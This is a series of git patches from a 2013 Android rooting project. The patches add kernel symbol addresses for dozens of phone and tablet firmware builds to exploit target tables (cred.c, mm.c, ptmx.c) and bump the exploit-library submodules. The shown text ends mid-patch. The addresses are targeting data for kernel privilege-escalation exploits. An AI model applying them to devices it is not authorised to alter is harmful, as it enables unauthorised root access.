From 6ab243abb101d1295ad8f9c55ade3c96bc8708f8 Mon Sep 17 00:00:00 2001 From: Hiroyuki Ikezoe Date: Thu, 20 Jun 2013 18:24:02 +0900 Subject: [PATCH 001/125] Change libperf_event_exploit path --- .gitmodules | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitmodules b/.gitmodules index fb45603..492b619 100644 --- a/.gitmodules +++ b/.gitmodules @@ -6,7 +6,7 @@ url = git://github.com/fi01/android_device_database.git [submodule "libperf_event_exploit"] path = libperf_event_exploit - url = git://github.com/hiikezoe/libperf_event_exploit.git + url = git://github.com/android-rooting-tools/libperf_event_exploit.git [submodule "libmsm_acdb_exploit"] path = libmsm_acdb_exploit url = git://github.com/fi01/libmsm_acdb_exploit.git From fd4c49dbf59a77e3243338cb74f19d8fcbf43102 Mon Sep 17 00:00:00 2001 From: fi01 Date: Fri, 21 Jun 2013 14:18:57 +0900 Subject: [PATCH 002/125] Change android_device_database path --- .gitmodules | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.gitmodules b/.gitmodules index 492b619..46c8151 100644 --- a/.gitmodules +++ b/.gitmodules @@ -3,7 +3,7 @@ url = git://github.com/hiikezoe/libdiagexploit.git [submodule "device_database"] path = device_database - url = git://github.com/fi01/android_device_database.git + url = git://github.com/android-rooting-tools/android_device_database.git [submodule "libperf_event_exploit"] path = libperf_event_exploit url = git://github.com/android-rooting-tools/libperf_event_exploit.git From 8e553d208a02e4b5e27f6cd45e9f8487bb254089 Mon Sep 17 00:00:00 2001 From: fi01 Date: Wed, 19 Jun 2013 14:34:09 +0900 Subject: [PATCH 003/125] Support SC-01E and SC-04E Adjust build version for SCL21 --- cred.c | 3 +++ device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 3 +++ ptmx.c | 5 ++++- 5 files changed, 12 insertions(+), 3 deletions(-) diff --git a/cred.c b/cred.c index 0ca2847..0ceda5f 100644 --- a/cred.c +++ b/cred.c @@ -23,6 +23,9 @@ typedef struct _supported_device { static supported_device supported_devices[] = { { DEVICE_IS17SH_01_00_04, 0xc01c66a8, 0xc01c5fd8 }, + { DEVICE_SC01E_LJ3, 0xc01244b8, 0xc0123d6c }, + { DEVICE_SC04E_MDI, 0xc0096068, 0xc0095b54 }, + { DEVICE_SC04E_MF1, 0xc00960d0, 0xc0095bbc }, { DEVICE_SH04E_01_00_02, 0xc008d86c, 0xc008d398 }, { DEVICE_SH04E_01_00_03, 0xc008d99c, 0xc008d4c8 }, { DEVICE_SO01E_9_1_C_0_473, 0xc009843c, 0xc0097f60 }, diff --git a/device_database b/device_database index 1b2c303..2b33bdf 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 1b2c30320832cbe36805b3b15a0f7a15a285b499 +Subproject commit 2b33bdf90d758e4bc1a37d5de6df121171c8bd29 diff --git a/libperf_event_exploit b/libperf_event_exploit index fb38536..b188927 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit fb38536b9868e9ff662ec7c21f595536770f8b4c +Subproject commit b188927cc829671b6dd3f0f15c927b63bbf2899b diff --git a/mm.c b/mm.c index 601012e..a499dfa 100644 --- a/mm.c +++ b/mm.c @@ -9,6 +9,9 @@ typedef struct _supported_device { static supported_device supported_devices[] = { { DEVICE_IS17SH_01_00_04, 0xc0208a34 }, + { DEVICE_SC01E_LJ3, 0xc0192124 }, + { DEVICE_SC04E_MDI, 0xc011383c }, + { DEVICE_SC04E_MF1, 0xc01138a4 }, { DEVICE_SH04E_01_00_02, 0xc00e458c }, { DEVICE_SH04E_01_00_03, 0xc00e46bc }, { DEVICE_SO01E_9_1_C_0_473, 0xc010e1f4 }, diff --git a/ptmx.c b/ptmx.c index ef093e3..418e802 100644 --- a/ptmx.c +++ b/ptmx.c @@ -12,7 +12,10 @@ static supported_device supported_devices[] = { { DEVICE_F11D_V24R40A, 0xc1056998 }, { DEVICE_ISW12K_010_0_3000, 0xc0dc0a10 }, - { DEVICE_SCL21_KDALJD, 0xc0c71dc0 }, + { DEVICE_SCL21_LJD, 0xc0c71dc0 }, + { DEVICE_SC01E_LJ3, 0xc10a5a48 }, + { DEVICE_SC04E_MDI, 0xc1169808 }, + { DEVICE_SC04E_MF1, 0xc1169848 }, // ISW13F: Fujitsu added a method in struct file_operations { DEVICE_ISW13F_V69R51I, 0xc09fc5fc + 4 }, From fba7cb4f5232e0c28c58a57ccceccb331b0113dd Mon Sep 17 00:00:00 2001 From: fi01 Date: Fri, 21 Jun 2013 14:57:39 +0900 Subject: [PATCH 004/125] Support SGP312 10.1.C.0.370 Support SO-02E 10.1.D.0.343 Support SO-03E 10.1.E.0.265 Support SO-03E 10.1.E.0.269 Support SO-04E 10.1.1.D.0.179 Support SOL22 10.2.F.3.43 --- cred.c | 40 ++++++++++++++++++------------- device_database | 2 +- libdiagexploit | 2 +- libperf_event_exploit | 2 +- mm.c | 40 ++++++++++++++++++------------- ptmx.c | 56 ++++++++++++++++++++++++------------------- 6 files changed, 80 insertions(+), 62 deletions(-) diff --git a/cred.c b/cred.c index 0ceda5f..f3433ad 100644 --- a/cred.c +++ b/cred.c @@ -22,23 +22,29 @@ typedef struct _supported_device { } supported_device; static supported_device supported_devices[] = { - { DEVICE_IS17SH_01_00_04, 0xc01c66a8, 0xc01c5fd8 }, - { DEVICE_SC01E_LJ3, 0xc01244b8, 0xc0123d6c }, - { DEVICE_SC04E_MDI, 0xc0096068, 0xc0095b54 }, - { DEVICE_SC04E_MF1, 0xc00960d0, 0xc0095bbc }, - { DEVICE_SH04E_01_00_02, 0xc008d86c, 0xc008d398 }, - { DEVICE_SH04E_01_00_03, 0xc008d99c, 0xc008d4c8 }, - { DEVICE_SO01E_9_1_C_0_473, 0xc009843c, 0xc0097f60 }, - { DEVICE_SOL21_9_1_D_0_395, 0xc0098584, 0xc00980a8 }, - { DEVICE_HTL21_1_29_970_1, 0xc00ab9d8, 0xc00ab4c4 }, - { DEVICE_HTL22_1_05_970_1, 0xc00b2688, 0xc00b2174 }, - { DEVICE_HTL22_1_07_970_4, 0xc00b26a0, 0xc00b218c }, - { DEVICE_HTX21_1_20_971_1, 0xc00a6e54, 0xc00a6940 }, - { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, - { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, - { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, - { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, - { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc } + { DEVICE_IS17SH_01_00_04, 0xc01c66a8, 0xc01c5fd8 }, + { DEVICE_SC01E_LJ3, 0xc01244b8, 0xc0123d6c }, + { DEVICE_SC04E_MDI, 0xc0096068, 0xc0095b54 }, + { DEVICE_SC04E_MF1, 0xc00960d0, 0xc0095bbc }, + { DEVICE_SGP312_10_1_C_0_370, 0xc009363c, 0xc0093160 }, + { DEVICE_SH04E_01_00_02, 0xc008d86c, 0xc008d398 }, + { DEVICE_SH04E_01_00_03, 0xc008d99c, 0xc008d4c8 }, + { DEVICE_SO01E_9_1_C_0_473, 0xc009843c, 0xc0097f60 }, + { DEVICE_SO02E_10_1_D_0_343, 0xc009ca34, 0xc009c558 }, + { DEVICE_SO03E_10_1_E_0_265, 0xc00938a0, 0xc00933c4 }, + { DEVICE_SO03E_10_1_E_0_269, 0xc00938b0, 0xc00933d4 }, + { DEVICE_SO04E_10_1_1_D_0_179, 0xc009d500, 0xc009d024 }, + { DEVICE_SOL21_9_1_D_0_395, 0xc0098584, 0xc00980a8 }, + { DEVICE_SOL22_10_2_F_3_43, 0xc009d3f8, 0xc009cf1c }, + { DEVICE_HTL21_1_29_970_1, 0xc00ab9d8, 0xc00ab4c4 }, + { DEVICE_HTL22_1_05_970_1, 0xc00b2688, 0xc00b2174 }, + { DEVICE_HTL22_1_07_970_4, 0xc00b26a0, 0xc00b218c }, + { DEVICE_HTX21_1_20_971_1, 0xc00a6e54, 0xc00a6940 }, + { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, + { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, + { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, + { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, + { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); diff --git a/device_database b/device_database index 2b33bdf..38b89c2 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 2b33bdf90d758e4bc1a37d5de6df121171c8bd29 +Subproject commit 38b89c2875f4fdfe39df6e98d625a345181103cb diff --git a/libdiagexploit b/libdiagexploit index 80d0ad5..5ee183b 160000 --- a/libdiagexploit +++ b/libdiagexploit @@ -1 +1 @@ -Subproject commit 80d0ad59f3a271fa69a2c978de60407bbace4f9d +Subproject commit 5ee183b31d4928315a0d7b171680b0ae9b1a7d9c diff --git a/libperf_event_exploit b/libperf_event_exploit index b188927..b21caa8 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit b188927cc829671b6dd3f0f15c927b63bbf2899b +Subproject commit b21caa8851473550709f1c664aac919226b9c94b diff --git a/mm.c b/mm.c index a499dfa..837e438 100644 --- a/mm.c +++ b/mm.c @@ -8,23 +8,29 @@ typedef struct _supported_device { } supported_device; static supported_device supported_devices[] = { - { DEVICE_IS17SH_01_00_04, 0xc0208a34 }, - { DEVICE_SC01E_LJ3, 0xc0192124 }, - { DEVICE_SC04E_MDI, 0xc011383c }, - { DEVICE_SC04E_MF1, 0xc01138a4 }, - { DEVICE_SH04E_01_00_02, 0xc00e458c }, - { DEVICE_SH04E_01_00_03, 0xc00e46bc }, - { DEVICE_SO01E_9_1_C_0_473, 0xc010e1f4 }, - { DEVICE_SOL21_9_1_D_0_395, 0xc010e33c }, - { DEVICE_HTL21_1_29_970_1, 0xc00ff32c }, - { DEVICE_HTL22_1_05_970_1, 0xc0128b10 }, - { DEVICE_HTL22_1_07_970_4, 0xc0128b28 }, - { DEVICE_HTX21_1_20_971_1, 0xc00fa8b0 }, - { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0136294 }, - { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0135650 }, - { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0109894 }, - { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc011445c }, - { DEVICE_N05E_A1000311, 0xc0105800 } + { DEVICE_IS17SH_01_00_04, 0xc0208a34 }, + { DEVICE_SC01E_LJ3, 0xc0192124 }, + { DEVICE_SC04E_MDI, 0xc011383c }, + { DEVICE_SC04E_MF1, 0xc01138a4 }, + { DEVICE_SGP312_10_1_C_0_370, 0xc01090fc }, + { DEVICE_SH04E_01_00_02, 0xc00e458c }, + { DEVICE_SH04E_01_00_03, 0xc00e46bc }, + { DEVICE_SO01E_9_1_C_0_473, 0xc010e1f4 }, + { DEVICE_SO02E_10_1_D_0_343, 0xc01124f4 }, + { DEVICE_SO03E_10_1_E_0_265, 0xc0109360 }, + { DEVICE_SO03E_10_1_E_0_269, 0xc0109370 }, + { DEVICE_SO04E_10_1_1_D_0_179, 0xc0112fc0 }, + { DEVICE_SOL21_9_1_D_0_395, 0xc010e33c }, + { DEVICE_SOL22_10_2_F_3_43, 0xc0112230 }, + { DEVICE_HTL21_1_29_970_1, 0xc00ff32c }, + { DEVICE_HTL22_1_05_970_1, 0xc0128b10 }, + { DEVICE_HTL22_1_07_970_4, 0xc0128b28 }, + { DEVICE_HTX21_1_20_971_1, 0xc00fa8b0 }, + { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0136294 }, + { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0135650 }, + { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0109894 }, + { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc011445c }, + { DEVICE_N05E_A1000311, 0xc0105800 }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); diff --git a/ptmx.c b/ptmx.c index 418e802..8b0dcf3 100644 --- a/ptmx.c +++ b/ptmx.c @@ -8,35 +8,41 @@ typedef struct _supported_device { static supported_device supported_devices[] = { // F10D: Fujitsu added a method in struct file_operations - { DEVICE_F10D_V21R48A, 0xc09a60dc + 4 }, + { DEVICE_F10D_V21R48A, 0xc09a60dc + 4 }, - { DEVICE_F11D_V24R40A, 0xc1056998 }, - { DEVICE_ISW12K_010_0_3000, 0xc0dc0a10 }, - { DEVICE_SCL21_LJD, 0xc0c71dc0 }, - { DEVICE_SC01E_LJ3, 0xc10a5a48 }, - { DEVICE_SC04E_MDI, 0xc1169808 }, - { DEVICE_SC04E_MF1, 0xc1169848 }, + { DEVICE_F11D_V24R40A, 0xc1056998 }, + { DEVICE_ISW12K_010_0_3000, 0xc0dc0a10 }, + { DEVICE_SCL21_LJD, 0xc0c71dc0 }, + { DEVICE_SC01E_LJ3, 0xc10a5a48 }, + { DEVICE_SC04E_MDI, 0xc1169808 }, + { DEVICE_SC04E_MF1, 0xc1169848 }, // ISW13F: Fujitsu added a method in struct file_operations - { DEVICE_ISW13F_V69R51I, 0xc09fc5fc + 4 }, + { DEVICE_ISW13F_V69R51I, 0xc09fc5fc + 4 }, - { DEVICE_IS17SH_01_00_04, 0xc0edae90 }, - { DEVICE_SONYTABLET_S_RELEASE5A, 0xc06e4d18 }, - { DEVICE_SONYTABLET_P_RELEASE5A, 0xc06e6da0 }, - { DEVICE_SH04E_01_00_02, 0xc0eed190 }, - { DEVICE_SH04E_01_00_03, 0xc0eed190 }, - { DEVICE_SO01E_9_1_C_0_473, 0xc0d03208 }, - { DEVICE_SO04D_7_0_D_1_137, 0xc0c9d8a0 }, - { DEVICE_SOL21_9_1_D_0_395, 0xc0d030c8 }, - { DEVICE_HTL21_1_29_970_1, 0xc0d1d944 }, - { DEVICE_HTL22_1_05_970_1, 0xc0df467c }, - { DEVICE_HTL22_1_07_970_4, 0xc0df52bc }, - { DEVICE_HTX21_1_20_971_1, 0xc0ccc0b4 }, - { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0cc3dc0 }, - { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0cc37e8 }, - { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0d37488 }, - { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc0e3bed8 }, - { DEVICE_N05E_A1000311, 0xc0f58700 }, + { DEVICE_IS17SH_01_00_04, 0xc0edae90 }, + { DEVICE_SONYTABLET_S_RELEASE5A, 0xc06e4d18 }, + { DEVICE_SONYTABLET_P_RELEASE5A, 0xc06e6da0 }, + { DEVICE_SH04E_01_00_02, 0xc0eed190 }, + { DEVICE_SH04E_01_00_03, 0xc0eed190 }, + { DEVICE_SGP312_10_1_C_0_370, 0xc0d35ca8 }, + { DEVICE_SO01E_9_1_C_0_473, 0xc0d03208 }, + { DEVICE_SO02E_10_1_D_0_343, 0xc0e38620 }, + { DEVICE_SO03E_10_1_E_0_265, 0xc0d36aa8 }, + { DEVICE_SO03E_10_1_E_0_269, 0xc0d36aa8 }, + { DEVICE_SO04D_7_0_D_1_137, 0xc0c9d8a0 }, + { DEVICE_SO04E_10_1_1_D_0_179, 0xc0f392d8 }, + { DEVICE_SOL22_10_2_F_3_43, 0xc0e389b0 }, + { DEVICE_SOL21_9_1_D_0_395, 0xc0d030c8 }, + { DEVICE_HTL21_1_29_970_1, 0xc0d1d944 }, + { DEVICE_HTL22_1_05_970_1, 0xc0df467c }, + { DEVICE_HTL22_1_07_970_4, 0xc0df52bc }, + { DEVICE_HTX21_1_20_971_1, 0xc0ccc0b4 }, + { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0cc3dc0 }, + { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0cc37e8 }, + { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0d37488 }, + { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc0e3bed8 }, + { DEVICE_N05E_A1000311, 0xc0f58700 }, }; static int n_supported_devices = sizeof(supported_devices) / sizeof(supported_devices[0]); From b498c0d456e7c1ca8bc0d558f97605ba6332e4a7 Mon Sep 17 00:00:00 2001 From: Phungsuk Wangdu Date: Thu, 20 Jun 2013 11:02:16 +0530 Subject: [PATCH 005/125] Added support for device Sony Xperia Z (DEVICE_C6603_1275_1562_10_1_1_A_1_253) --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index f3433ad..54b96c2 100644 --- a/cred.c +++ b/cred.c @@ -43,6 +43,7 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, + { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/device_database b/device_database index 38b89c2..596df91 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 38b89c2875f4fdfe39df6e98d625a345181103cb +Subproject commit 596df91dd68e68deea03ed3ed04dbc11355298d4 diff --git a/libperf_event_exploit b/libperf_event_exploit index b21caa8..a08a5fc 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit b21caa8851473550709f1c664aac919226b9c94b +Subproject commit a08a5fc4607d80b57b0140aac7d4a75ecf3acc62 diff --git a/mm.c b/mm.c index 837e438..6cdacf4 100644 --- a/mm.c +++ b/mm.c @@ -29,6 +29,7 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0136294 }, { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0135650 }, { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0109894 }, + { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0109894 }, { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc011445c }, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index 8b0dcf3..0dcca72 100644 --- a/ptmx.c +++ b/ptmx.c @@ -41,6 +41,7 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0cc3dc0 }, { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0d37488 }, + { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0d37488 }, { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc0e3bed8 }, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; From 153d8baa38267bf44b826f9e6cb488b1d8ed6b48 Mon Sep 17 00:00:00 2001 From: Phungsuk Wangdu Date: Thu, 20 Jun 2013 12:00:20 +0530 Subject: [PATCH 006/125] Added support for device LG Optimus G E975 (DEVICE_LG_E975_V10e) --- cred.c | 1 + mm.c | 1 + ptmx.c | 1 + 3 files changed, 3 insertions(+) diff --git a/cred.c b/cred.c index 54b96c2..339cc8e 100644 --- a/cred.c +++ b/cred.c @@ -40,6 +40,7 @@ static supported_device supported_devices[] = { { DEVICE_HTL22_1_05_970_1, 0xc00b2688, 0xc00b2174 }, { DEVICE_HTL22_1_07_970_4, 0xc00b26a0, 0xc00b218c }, { DEVICE_HTX21_1_20_971_1, 0xc00a6e54, 0xc00a6940 }, + { DEVICE_LG_E975_V10e, 0xc00a0f90, 0xc00a0b6c }, { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, diff --git a/mm.c b/mm.c index 6cdacf4..f574028 100644 --- a/mm.c +++ b/mm.c @@ -26,6 +26,7 @@ static supported_device supported_devices[] = { { DEVICE_HTL22_1_05_970_1, 0xc0128b10 }, { DEVICE_HTL22_1_07_970_4, 0xc0128b28 }, { DEVICE_HTX21_1_20_971_1, 0xc00fa8b0 }, + { DEVICE_LG_E975_V10e, 0xc0116598 }, { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0136294 }, { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0135650 }, { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0109894 }, diff --git a/ptmx.c b/ptmx.c index 0dcca72..f1f73a7 100644 --- a/ptmx.c +++ b/ptmx.c @@ -38,6 +38,7 @@ static supported_device supported_devices[] = { { DEVICE_HTL22_1_05_970_1, 0xc0df467c }, { DEVICE_HTL22_1_07_970_4, 0xc0df52bc }, { DEVICE_HTX21_1_20_971_1, 0xc0ccc0b4 }, + { DEVICE_LG_E975_V10e, 0xc0f9da70 }, { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0cc3dc0 }, { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0d37488 }, From ddebffde339692566e5b1bbc4a4bece24098ed39 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Fri, 21 Jun 2013 18:42:01 +0530 Subject: [PATCH 007/125] added support for Xperia ZL (C6503) - 10.3.A.0.423 - 1266-7597 --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 339cc8e..68a9c24 100644 --- a/cred.c +++ b/cred.c @@ -46,6 +46,7 @@ static supported_device supported_devices[] = { { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, + { DEVICE_C6503_1266_7597_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/device_database b/device_database index 596df91..cfe53a1 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 596df91dd68e68deea03ed3ed04dbc11355298d4 +Subproject commit cfe53a12337be22840aa89bde75f816d38d0a35f diff --git a/libperf_event_exploit b/libperf_event_exploit index a08a5fc..8e80cbc 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit a08a5fc4607d80b57b0140aac7d4a75ecf3acc62 +Subproject commit 8e80cbce0d3cf8b1856a0e4dadceecd0ae216bd3 diff --git a/mm.c b/mm.c index f574028..70c0098 100644 --- a/mm.c +++ b/mm.c @@ -32,6 +32,7 @@ static supported_device supported_devices[] = { { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0109894 }, { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc011445c }, + { DEVICE_C6503_1266_7597_10_3_A_0_423, 0xc0112668 }, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index f1f73a7..1c85e78 100644 --- a/ptmx.c +++ b/ptmx.c @@ -44,6 +44,7 @@ static supported_device supported_devices[] = { { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0d37488 }, { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc0e3bed8 }, + { DEVICE_C6503_1266_7597_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; From 9616a0abcc08a2758eb8aed9c3706abb5662d12b Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 22 Jun 2013 03:35:50 +0530 Subject: [PATCH 008/125] added support for Xperia Tablet Z (SGP321) - 10.1.1.A.1.307 --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 68a9c24..7819b2f 100644 --- a/cred.c +++ b/cred.c @@ -26,6 +26,7 @@ static supported_device supported_devices[] = { { DEVICE_SC01E_LJ3, 0xc01244b8, 0xc0123d6c }, { DEVICE_SC04E_MDI, 0xc0096068, 0xc0095b54 }, { DEVICE_SC04E_MF1, 0xc00960d0, 0xc0095bbc }, + { DEVICE_SGP321_10_1_1_A_1_307, 0xc0094124, 0xc0093c48 }, { DEVICE_SGP312_10_1_C_0_370, 0xc009363c, 0xc0093160 }, { DEVICE_SH04E_01_00_02, 0xc008d86c, 0xc008d398 }, { DEVICE_SH04E_01_00_03, 0xc008d99c, 0xc008d4c8 }, diff --git a/device_database b/device_database index cfe53a1..a19bf5d 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit cfe53a12337be22840aa89bde75f816d38d0a35f +Subproject commit a19bf5d0a1132c49fd3ff6716f8cc133366d79cc diff --git a/libperf_event_exploit b/libperf_event_exploit index 8e80cbc..dad23e6 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 8e80cbce0d3cf8b1856a0e4dadceecd0ae216bd3 +Subproject commit dad23e6fd4671cdf1c45107796792811f22d451b diff --git a/mm.c b/mm.c index 70c0098..3f39a99 100644 --- a/mm.c +++ b/mm.c @@ -12,6 +12,7 @@ static supported_device supported_devices[] = { { DEVICE_SC01E_LJ3, 0xc0192124 }, { DEVICE_SC04E_MDI, 0xc011383c }, { DEVICE_SC04E_MF1, 0xc01138a4 }, + { DEVICE_SGP321_10_1_1_A_1_307, 0xc0109be4 }, { DEVICE_SGP312_10_1_C_0_370, 0xc01090fc }, { DEVICE_SH04E_01_00_02, 0xc00e458c }, { DEVICE_SH04E_01_00_03, 0xc00e46bc }, diff --git a/ptmx.c b/ptmx.c index 1c85e78..d37cdbc 100644 --- a/ptmx.c +++ b/ptmx.c @@ -25,6 +25,7 @@ static supported_device supported_devices[] = { { DEVICE_SONYTABLET_P_RELEASE5A, 0xc06e6da0 }, { DEVICE_SH04E_01_00_02, 0xc0eed190 }, { DEVICE_SH04E_01_00_03, 0xc0eed190 }, + { DEVICE_SGP321_10_1_1_A_1_307, 0xc0d36740 }, { DEVICE_SGP312_10_1_C_0_370, 0xc0d35ca8 }, { DEVICE_SO01E_9_1_C_0_473, 0xc0d03208 }, { DEVICE_SO02E_10_1_D_0_343, 0xc0e38620 }, From 34e8d8792904d407a911bd13828f9ab1cf742ccc Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 22 Jun 2013 03:40:46 +0530 Subject: [PATCH 009/125] added support for Xperia Tablet Z (SGP311) - 10.1.C.0.370 --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 7819b2f..af15dfb 100644 --- a/cred.c +++ b/cred.c @@ -28,6 +28,7 @@ static supported_device supported_devices[] = { { DEVICE_SC04E_MF1, 0xc00960d0, 0xc0095bbc }, { DEVICE_SGP321_10_1_1_A_1_307, 0xc0094124, 0xc0093c48 }, { DEVICE_SGP312_10_1_C_0_370, 0xc009363c, 0xc0093160 }, + { DEVICE_SGP311_10_1_C_0_370, 0xc009363c, 0xc0093160 }, { DEVICE_SH04E_01_00_02, 0xc008d86c, 0xc008d398 }, { DEVICE_SH04E_01_00_03, 0xc008d99c, 0xc008d4c8 }, { DEVICE_SO01E_9_1_C_0_473, 0xc009843c, 0xc0097f60 }, diff --git a/device_database b/device_database index a19bf5d..9e38b54 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit a19bf5d0a1132c49fd3ff6716f8cc133366d79cc +Subproject commit 9e38b54ae3adbc765cb6cfa0e497d4c3c4452703 diff --git a/libperf_event_exploit b/libperf_event_exploit index dad23e6..bb520f8 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit dad23e6fd4671cdf1c45107796792811f22d451b +Subproject commit bb520f8eb85f7b2baa0e04b3a811471508dfd7ea diff --git a/mm.c b/mm.c index 3f39a99..f82e0ce 100644 --- a/mm.c +++ b/mm.c @@ -14,6 +14,7 @@ static supported_device supported_devices[] = { { DEVICE_SC04E_MF1, 0xc01138a4 }, { DEVICE_SGP321_10_1_1_A_1_307, 0xc0109be4 }, { DEVICE_SGP312_10_1_C_0_370, 0xc01090fc }, + { DEVICE_SGP311_10_1_C_0_370, 0xc01090fc }, { DEVICE_SH04E_01_00_02, 0xc00e458c }, { DEVICE_SH04E_01_00_03, 0xc00e46bc }, { DEVICE_SO01E_9_1_C_0_473, 0xc010e1f4 }, diff --git a/ptmx.c b/ptmx.c index d37cdbc..b0120f8 100644 --- a/ptmx.c +++ 